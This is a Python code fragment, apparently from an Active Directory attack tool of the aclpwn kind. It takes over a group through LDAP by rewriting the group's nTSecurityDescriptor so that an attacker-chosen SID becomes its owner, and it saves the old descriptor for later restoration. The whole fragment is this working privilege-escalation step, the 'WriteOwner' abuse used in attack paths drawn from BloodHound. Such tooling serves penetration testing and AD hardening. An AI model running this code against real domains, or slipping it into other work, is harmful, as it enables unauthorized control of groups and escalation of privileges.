    group_sam = get_sam_name(group_bh_name)
    # Dictionary for restore data
    restoredata = {}
    # group_sam is filter-escaped, so a name containing filter metacharacters
    # cannot change the meaning of the search.
    ldapconnection.search(get_ldap_root(ldapconnection), '(sAMAccountName=%s)' % escape_filter_chars(group_sam), attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    # NOTE(review): an empty search result raises a bare IndexError here
    # instead of a descriptive error.
    entry = ldapconnection.entries[0]
    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    if secDesc['OwnerSid'].formatCanonical() == usersid:
        # Nothing is written and no restore record is pushed in this case.
        print_m('%s is already owned by %s, skipping' % (group_sam, user_sam))
        return True
    # Save old SD for restore purposes
    restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
    restoredata['target_sid'] = usersid
    restoredata['old_owner_sid'] = secDesc['OwnerSid'].formatCanonical()
    # Modify the sid
    secDesc['OwnerSid'] = LDAP_SID()
    secDesc['OwnerSid'].fromCanonical(usersid)
    dn = entry.entry_dn
    restoredata['target_dn'] = dn
    data = secDesc.getData()
    res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
    if res:
        print_o('Owner change successful')
        restoredata['success'] = True
        state.push_history('write_owner', restoredata)
        return True
    else:
        # Record the failed attempt too, so the history stays complete.
        restoredata['success'] = False
        state.push_history('write_owner', restoredata)
        raise ExploitException('Failed to change owner of group %s to %s: %s' % (dn, userdn, str(ldapconnection.result)))